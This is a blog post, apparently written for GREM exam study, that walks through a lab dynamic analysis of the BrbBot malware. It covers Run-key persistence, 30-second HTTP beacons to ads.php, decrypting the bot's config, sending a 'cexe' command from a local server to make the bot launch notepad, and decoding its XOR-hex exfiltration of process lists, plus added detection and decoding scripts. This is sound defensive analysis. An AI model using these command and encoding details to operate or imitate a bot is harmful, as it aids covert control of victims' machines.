Monday, January 11, 2021

Continuing Malware Analysis - Dynamic Analysis of BrbBot

This post and all others for this month are part of the series which I used to help me prepare for my GIAC Reverse Engineer Malware (GREM) certification.

In the previous post, we did static analysis of Brbbot. In this post, we look at dynamic analysis to gain insight into the behaviour of the program. Remember that VirusTotal reported 52/74 engines flagging this file as malicious.

The tools used here are as follows:
- TShark
- InetSim on Kali
- Process Monitor - Windows 10
- Process Hacker - Windows 10
- Process Explorer - Windows 10
- RegShot - Windows 10
- ProcDot

Let's see what the tools above provided us once we executed brbbot.exe on Windows 10 as an administrator.

Looking first at the RegShot comparison summary, we see:

RegShot Comparison Summary

Note that not all of the changes are from running brbbot.exe; some come from other programs which were executed, intentionally or unintentionally.

Looking at the report, a few entries of immediate interest stand out:

Created with Regshot 1.9.1 x64 Unicode (beta r321)
Datetime: 2020-11-08 20:19:04, 2020-11-08 22:15:15
Username: SecurityNik, SecurityNik

Values added: 
 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\brbbot: "C:\Users\SecurityNik\AppData\Roaming\brbbot.exe"
HKU\S-1-5-21-3846991316-327138358-508696823-1002\Software\Microsoft\Windows\CurrentVersion\Search\RecentApps\{A6858C8A-6321-4416-ACF2-A4DF3C4480B4}\AppId: "C:\brbbot.exe"
 HKU\S-1-5-21-3846991316-327138358-508696823-1002\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\brbbot.exe: 53 41 43 50 01 00 00 00 00 00 00 00 07 00 00 00 28 00 00 00 00 28 01 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 0A 73 20 00 00 DB 80 FD AC 28 39 D3 01 00 00 00 00 00 00 00 00
 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\brbbot: "C:\Users\SecurityNik\AppData\Roaming\brbbot.exe"
 HKU\S-1-5-21-3846991316-327138358-508696823-1002\Software\Microsoft\Windows\CurrentVersion\Search\RecentApps\{A6858C8A-6321-4416-ACF2-A4DF3C4480B4}\AppId: "C:\brbbot.exe"

Taking a quick look via Process Hacker.

Looking at the general tab

Peeking into the strings loaded into memory.

Peeking into the modules used by brbbot.exe.

Looking at the Handles.

Transitioning to Process Monitor, we see, along with the network connections, a file named brbconfig.tmp being read and then closed. If you remember, in the static analysis there was a config file in the resource section. Could this be the file being read here?

Transitioning to ProcDot, where a saved copy of the Process Monitor events is fed to it as the input file.

Transitioning to the network traffic as seen from the perspective of INetSim and TShark.

Looking first at the INetSim report below, we see a DNS request to followed by an HTTP GET request. The GET request seems to be for a file named ads.php. The request also carries some parameters: i seems to be my computer's IP address, c seems to be my computer name, and p is a long value which seems to be hex.

$ sudo cat /var/log/inetsim/report/report.18951.txt | more
=== Report for session '18951' ===

Real start date            : 2020-11-08 17:11:53
Simulated start date       : 2020-11-08 17:11:53
Time difference on startup : none

2020-11-08 17:12:52  DNS connection, type: A, class: IN, requested name:
2020-11-08 17:12:52  HTTP connection, method: GET, URL:
0822282f3e36083e2f2f32353c28753e233e602f3a28303334282f2c753e233e603f37373334282f753e233e603f37373334282f753e233e6039293939342f753e233e, f
ile name: /var/lib/inetsim/http/fakefiles/sample.html


Let's get TShark's view of this communication. First, looking at the DNS request and response, we see the query for

└─$ tshark -r brbbot.pcap -Y " =="
   15 25.543214256 →   DNS 73 Standard query 0x6a64 A
   16 25.551623068 →   DNS 89 Standard query response 0x6a64 A A

Looking at the HTTP traffic, we see below that there are multiple connections. Looking closely at the times, it seems the malware calls home (beacons) every 30 seconds.

└─$ tshark -r brbbot.pcap -Y " ==" -T fields -e frame.time -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e -E header=y
           frame.time                     ip.src   tcp.srcport  ip.dst     tcp.dstport
Nov  8, 2020 17:12:52.715732789 EST      4081      80
Nov  8, 2020 17:13:22.745066520 EST      4082      80
Nov  8, 2020 17:13:52.763137491 EST      4084      80
Nov  8, 2020 17:14:22.782289408 EST      4086      80
Nov  8, 2020 17:14:52.826690345 EST      4087      80
Nov  8, 2020 17:15:22.865526674 EST      4088      80
Nov  8, 2020 17:15:52.908439391 EST      4089      80
Nov  8, 2020 17:16:22.928449020 EST      4090      80
Nov  8, 2020 17:16:52.954382147 EST      4092      80
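The 30-second cadence above can be measured rather than eyeballed. This is an added example (not from the original post): it parses the frame.time column of the TShark output, computes the inter-arrival times and flags the stream as a beacon when the jitter around the mean interval is small. The IP columns are omitted from the sample because the page elided them.

```python
import re
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample: the frame.time column from the tshark output in the post.
TSHARK_LINES = """\
Nov  8, 2020 17:12:52.715732789 EST
Nov  8, 2020 17:13:22.745066520 EST
Nov  8, 2020 17:13:52.763137491 EST
Nov  8, 2020 17:14:22.782289408 EST
Nov  8, 2020 17:14:52.826690345 EST
Nov  8, 2020 17:15:22.865526674 EST
Nov  8, 2020 17:15:52.908439391 EST
Nov  8, 2020 17:16:22.928449020 EST
Nov  8, 2020 17:16:52.954382147 EST
"""

TIME_RE = re.compile(r"^(\w{3})\s+(\d{1,2}), (\d{4}) (\d{2}:\d{2}:\d{2})\.(\d+)")


def parse_frame_time(line):
    """Parse one tshark frame.time value; header or blank lines return None."""
    m = TIME_RE.match(line)
    if not m:
        return None
    mon, day, year, hms, frac = m.groups()
    # strptime handles at most microseconds, so truncate the nanosecond field.
    stamp = f"{mon} {int(day):02d} {year} {hms}.{frac[:6]}"
    return datetime.strptime(stamp, "%b %d %Y %H:%M:%S.%f")


def beacon_intervals(text):
    """Seconds between consecutive requests, in capture order."""
    times = [t for t in (parse_frame_time(l) for l in text.splitlines()) if t]
    return [(b - a).total_seconds() for a, b in zip(times, times[1:])]


def looks_like_beacon(intervals, min_samples=5, max_jitter=0.05):
    """Return (is_beacon, mean_interval, jitter). Jitter is the population
    standard deviation divided by the mean; a tight schedule scores near 0."""
    if len(intervals) < min_samples:
        return False, 0.0, 0.0
    avg = mean(intervals)
    jitter = pstdev(intervals) / avg if avg else float("inf")
    return jitter <= max_jitter, avg, jitter
```

Real traffic from a C2 with randomised sleep would need a looser jitter threshold or a histogram over many more samples; the threshold here is tuned to this capture.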

Looking into the session with source port 4081 and destination port 80, we see:

└─$ tshark -r brbbot.pcap -q -z follow,tcp,ascii,,                                                     130 ⨯

Follow: tcp,ascii
Filter: ((ip.src eq and tcp.srcport eq 4081) and (ip.dst eq and tcp.dstport eq 80)) or ((ip.src eq and tcp.srcport eq 80) and (ip.dst eq and tcp.dstport eq 4081))
Node 0:
Node 1:
GET /ads.php?i= HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Connection: Close
Cache-Control: no-cache

HTTP/1.1 200 OK
Connection: Close
Content-Type: text/html
Date: Sun, 08 Nov 2020 22:12:52 GMT
Content-Length: 258
Server: INetSim HTTP Server

    <title>INetSim default HTML page</title>
    <p align="center">This is the default HTML page for INetSim HTTP server fake mode.</p>
    <p align="center">This file is an HTML document.</p>

Above we see the default INetSim page returned. However, the request was made for ads.php. Maybe we can manipulate this request by adding a file called ads.php. I instead switched to Apache and created a file named ads.php in the Apache directory and then let brbbot.exe grab that file. That seems to work. Let's see what that looks like. Here is the file:

└─$ sudo cat /var/www/html/ads.php
        <TITLE>SecurityNik ads.php</TITLE>
                Welcome to SecurityNik World!


When the bot makes the request, we see Apache returned ads.php via the 200 successful message.

- - [08/Nov/2020:22:24:05 -0500] "GET /ads.php?i= HTTP/1.1" 200 292 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"

Stepping back for a second, we saw the system create a file brbconfig.tmp. Looking into the file, we see:

The above does not seem helpful in any way. Taking a look via hexdump:

Looks like we will need to decrypt or decode this file. If we remember, during the static analysis phase, we saw cryptographic functions such as:

Setting a breakpoint on the CreateFileA function, we see the first argument is in the RCX register. If I understood the x64 calling convention correctly, it uses the registers RCX, RDX, R8 and R9 for parameters before using the stack. In this case the first parameter of CreateFileA is lpFileName. If I am wrong on this, please correct me if you are reading this.

Now that we know the file is created, let's jump to where it is read by setting another breakpoint, this time on the ReadFile call. Looking at the Microsoft documentation, it says the first argument to ReadFile is a handle to the device. Looking below, we see the handle is 0x108, which can be found in the RCX register.

Confirming that this is the handle to the brbconfig.tmp file, we now take a look at the handles from a different perspective. This time we go back to Sysinternals handle64.exe.

C:\Tools\SysinternalsSuite>handle64.exe -p brbbot.exe                    
Nthandle v4.11 - Handle viewer  
Copyright (C) 1997-2017 Mark Russinovich 
Sysinternals - 
brbbot.exe pid: 4164 SECURITYNIK-WIN\SecurityNik
108: File  (R--)   C:\GREM-Malware\Malware\day1\brbconfig.tmp

Above we see handle 0x108 points to the brbconfig.tmp file.

Scrolling through until I found the CryptDecrypt function, I then set a breakpoint at the instruction directly after it. This allowed me to see the decrypted content of the brbconfig.tmp file, as shown below.

The decrypted communication looks like


Above we see the ads.php file is requested, along with what seem to be commands to execute and an encode value of 5b.

Let's add an exec value for notepad.exe to our ads.php file to see what we get:

─$ sudo bash -c 'echo -e cexe notepad.exe > /var/www/html/ads.php'
─$ sudo cat /var/www/html/ads.php                                 
cexe notepad.exe

Running brbbot.exe again, we see that notepad is being executed around every 30 seconds.

PS C:\Users\SecurityNik> Get-Process *notepad* | Select-Object -Property Name,Id,StartTime,ProcessName | Sort-Object -Property StartTime

Name      Id StartTime             ProcessName
----      -- ---------             -----------
notepad 5444 11/9/2020 11:38:58 PM notepad
notepad 3528 11/9/2020 11:39:29 PM notepad
notepad 3856 11/9/2020 11:39:59 PM notepad
notepad 7740 11/9/2020 11:40:29 PM notepad
notepad 5376 11/9/2020 11:40:59 PM notepad
notepad 6984 11/9/2020 11:41:29 PM notepad
notepad 7252 11/9/2020 11:41:59 PM notepad
notepad 7748 11/9/2020 11:42:29 PM notepad
notepad 7176 11/9/2020 11:42:59 PM notepad
notepad 2964 11/9/2020 11:43:29 PM notepad
notepad 3640 11/9/2020 11:43:59 PM notepad
notepad 2280 11/9/2020 11:44:29 PM notepad
notepad 5448 11/9/2020 11:44:59 PM notepad
notepad 8184 11/9/2020 11:45:29 PM notepad
notepad 2112 11/9/2020 11:45:59 PM notepad
notepad 2428 11/9/2020 11:46:29 PM notepad
notepad 3368 11/9/2020 11:46:59 PM notepad
notepad 5036 11/9/2020 11:47:29 PM notepad
notepad 3632 11/9/2020 11:47:59 PM notepad
notepad 2608 11/9/2020 11:48:29 PM notepad
notepad 6372 11/9/2020 11:48:59 PM notepad
notepad 7524 11/9/2020 11:49:29 PM notepad
notepad 6780 11/9/2020 11:49:59 PM notepad
notepad  248 11/9/2020 11:50:29 PM notepad
notepad 7616 11/9/2020 11:50:59 PM notepad
notepad  192 11/9/2020 11:51:29 PM notepad

Taking a view via WMIC, we see:

PS C:\Users\SecurityNik> wmic process where "name like '%notepad%'" get name,processID,ParentProcessID
Name         ParentProcessId  ProcessId
notepad.exe  1596             5444
notepad.exe  1596             3528
notepad.exe  1596             3856
notepad.exe  1596             7740
notepad.exe  1596             5376
notepad.exe  1596             6984
notepad.exe  1596             7252
notepad.exe  1596             7748
notepad.exe  1596             7176
notepad.exe  1596             2964
notepad.exe  1596             3640
notepad.exe  1596             2280
notepad.exe  1596             5448
notepad.exe  1596             8184
notepad.exe  1596             2112
notepad.exe  1596             2428
notepad.exe  1596             3368
notepad.exe  1596             5036
notepad.exe  1596             3632
notepad.exe  1596             2608
notepad.exe  1596             6372
notepad.exe  1596             7524
notepad.exe  1596             6780
notepad.exe  1596             248
notepad.exe  1596             7616
notepad.exe  1596             192
notepad.exe  1596             672

Looking at the parent for those Notepad.exe processes, we see brbbot.exe is the parent with PID 1596.

PS C:\Users\SecurityNik> wmic process where processid="1596" get name,processID,parentProcessID
Name        ParentProcessId  ProcessId
brbbot.exe  4476             1596

The final step is to decode the p parameter of the HTTP request above. We saw in the ads.php file a value of encode=5b; this 5b is used to hex encode the values within the p parameter. I copied the values in the p parameter to a file named p-parameter.txt with everything on one line. Here is what that looks like:

└─$ cat p-parameter.txt 

xxd is used next to revert the hex values above to raw binary, as shown below:

└─$ xxd -revert -plain p-parameter.txt > p-parameter.raw

The file p-parameter.raw looks like this:

└─$ cat p-parameter.raw           
?7>"(/>6`(6((u>#>`8()((u>#>`,25252/u>#>`8()((u>#>`,2574<45u>#>`(>)-28>(u>#>`7(:((u>#>`(-834(/u>#>`=45/?)-34(/u>#>`=45/?4>)-28>u>#>`>64)"{▒46+)>((245`(-834(/u>#>`(-834(/u>#>`(-834(/u>#>`(-834(/u>#>`(-834(/u>#>`(+447(-u>#>`(-834(/u>#>"(645u>#>`(+7.50?u>#>>8.)2/">:7/>)-28>u>#>`(-834(/u>#>`.5(>8:++u>#>`84534(/u>#>`(+7.50v,25>-/74<u>#>`(-834(/u>#>>:)835?>#>)u>#>`(-834(/u>#>`(234(/u>#>`(-834(/u>#>`/:(034(/,u>#>`8/=645u>#>`>#+74)>)u>#>3>77#+>)2>58>4(/u>#>>:)83u>#>`       .5/26>)4#):"u>#>`5>)2->u>#>`>7+0>)u>#>0"+>:80<)4.5?4(/u>#>▒.2u>#>`
                                                       )48>((:80>)u>#>`+)48>#+mou>#>`   .5/26>)40>)u>#>`?7734(/u>#>`86?u>#>`84534(/u>#>`
                            )48645mou>#>`       ><(34/v#mov5284?>u>#>`(-834(/u>#>`

To decode the p-parameter.raw file, I passed it as input to CyberChef.

After decoding, we see that, along with the IP address and computer name, brbbot.exe was also exfiltrating information on the processes currently running on the host.
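The CyberChef step can be reproduced in a few lines so the beacon can be decoded straight from a proxy or INetSim log. This is an added example, not code from the post: it assumes the encode value is a single-byte XOR key (0x5b) applied before the hex layer that xxd removed above, which is what turns the raw bytes shown above into readable process names. The p value is the one INetSim logged in the post; the i and c values are placeholders because the page elided them.

```python
import binascii
from urllib.parse import parse_qs, urlsplit

# Constructed sample beacon: placeholder i/c values, p copied from the INetSim report.
SAMPLE_REQUEST = (
    "/ads.php?i=192.0.2.10&c=WIN-LAB&p="
    "0822282f3e36083e2f2f32353c28753e233e602f3a28303334282f2c753e233e60"
    "3f37373334282f753e233e603f37373334282f753e233e6039293939342f753e233e"
)


def decode_p(hex_value, key=0x5B):
    """Undo the hex layer (what xxd -r -p did in the post), then XOR every byte
    with the key taken from the encode=5b line in the bot's config."""
    raw = binascii.unhexlify(hex_value)
    return bytes(b ^ key for b in raw).decode("ascii", errors="replace")


def parse_beacon(path_and_query, key=0x5B):
    """Break a GET /ads.php?... request into the fields brbbot sends home."""
    qs = parse_qs(urlsplit(path_and_query).query)
    procs = decode_p(qs["p"][0], key).split(";") if "p" in qs else []
    return {
        "ip": qs.get("i", [""])[0],
        "host": qs.get("c", [""])[0],
        "processes": [p for p in procs if p],
    }


if __name__ == "__main__":
    print(parse_beacon(SAMPLE_REQUEST))
```

The same function applied to the Apache access log entries above recovers the process list for each beacon without a debugger or CyberChef.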

That's all for this post, as I believe I achieved the learnings I required for this malware.

P.S. Not sure if you noticed it. However, I had to run brbbot.exe a few times, and thus you might have noticed the PID changed, etc. The concepts still remain the same though.
